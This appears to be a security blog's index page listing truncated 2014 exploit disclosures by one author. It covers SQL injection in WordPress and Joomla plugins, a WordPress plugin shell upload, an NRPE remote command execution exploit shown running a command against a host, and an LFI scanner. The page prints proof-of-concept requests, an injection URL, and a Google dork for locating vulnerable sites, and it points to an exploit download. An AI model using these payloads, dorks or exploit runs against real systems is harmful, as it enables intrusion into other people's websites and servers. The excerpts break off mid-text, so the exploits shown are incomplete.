Security

WordPress Huge-IT Image Gallery 1.0.1 SQL Injection

###################### # Exploit Title : WordPress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection # Exploit Author : Claudio Viviani # Vendor Homepage : http://huge-it.com/ # Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip (Fixed) Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs # Date : 2014-08-25 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox # Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Location : http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php ###################### # Vulnerable code : function editgallery($id) { global $wpdb; if(isset($_GET["removeslide"])){ if($_GET["removeslide"] !...

WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability

###################### # Exploit Title : WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : http://tribulant.com # Software Link : http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip # Date : 2014-08-09 # Tested on : Windows 7 / Mozilla Firefox ###################### # Description : Any user could upload php files (administrator by default). ###################### # Location http://127.0.0.1/wp-content/plugins/slideshow-gallery/views/admin/slides/save.php ###################### # PoC Exploit: POST Host=127.0.0.1 User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31....

NRPE 2.15 Remote Command Execution Exploit

NRPE 2.15 Remote Command Execution python Exploit – CVE-2014-2913 Download Exploit: HERE Custom Command Mode: claudio@backbox3:~/Desktop$ ./nrpe_215_rce_exploit.py -H 10.0.0.70 --cmd="id" -c check_users $$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$\ $$$$$$$\ $$$\ $$ |$$ __$$\ $$ __$$\ $$ _____| $$ __$$\ $$$$ | $$ ____| $$$$\ $$ |$$ | $$ |$$ | $$ |$$ | \__/ $$ | \_$$ | $$ | $$ $$\$$ |$$$$$$$ |$$$$$$$ |$$$$$\ $$$$$$ | $$ | $$$$$$$\ $$ \$$$$ |$$ __$$< $$ ____/ $$ __| $$ ____/ $$ | \_____$$\ $$ |\$$$ |$$ | $$ |$$ | $$ | $$ | $$ | $$\ $$ | $$ | \$$ |$$ | $$ |$$ | $$$$$$$$\ $$$$$$$$\ $$\ $$$$$$\$$$$$$ | \__| \__|\__| \__|\__| \________| \________|\__|\______|\______/ $$$$$$$\ $$$$$$\ $$$$$$$$\ $$ __$$\ $$ __$$\ $$ _____| $$ | $$ |$$ / \__|$$ | $$$$$$$ |$$ | $$$$$\ $$ __$$< $$ | $$ __| $$ | $$ |$$ | $$\ $$ | $$ | $$ |\$$$$$$ |$$$$$$$$\ \__| \__| \______/ \________| NRPE <= 2....

aLFI Scanner – An0th3r LFI sC4Nn3r v1.0

[claudio@localhost ~]$ ./aLFIscanner.py -u 10.0.0.67 -t lfi.php?ID= $$\ $$$$$$$$\ $$$$$$\ $$ | $$ _____|\_$$ _| $$$$$$\ $$ | $$ | $$ | \____$$\ $$ | $$$$$\ $$ | $$$$$$$ |$$ | $$ __| $$ | $$ __$$ |$$ | $$ | $$ | \$$$$$$$ |$$$$$$$$\ $$ | $$$$$$\ \_______|\________|\__| \______| $$$$$$\ $$ __$$\ $$ / \__| $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$\ \$$$$$$\ $$ _____|\____$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ \____$$\ $$ / $$$$$$$ |$$ | $$ |$$ | $$ |$$$$$$$$ |$$ | \__| $$\ $$ |$$ | $$ __$$ |$$ | $$ |$$ | $$ |$$ ____|$$ | \$$$$$$ |\$$$$$$$\$$$$$$$ |$$ | $$ |$$ | $$ |\$$$$$$$\ $$ | \______/ \_______|\_______|\__| \__|\__| \__| \_______|\__| An0th3r LFI sC4Nn3r v1....

Joomla Spider video player 2.8.3 SQL Injection

###################### # Exploit Title : Joomla Spider video player 2.8.3 SQL Injection # Exploit Author : Claudio Viviani # Vendor Homepage : http://web-dorado.com/ # Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321 # Dork Google: inurl:/component/spidervideoplayer inurl:option=com_spidervideoplayer # Date : 2014-08-26 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox ###################### # PoC Exploit: http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1' "theme" variable is not sanitized. ##################### Discovered By : Claudio Viviani http://www.homelab.it [email protected] [email protected] https://www....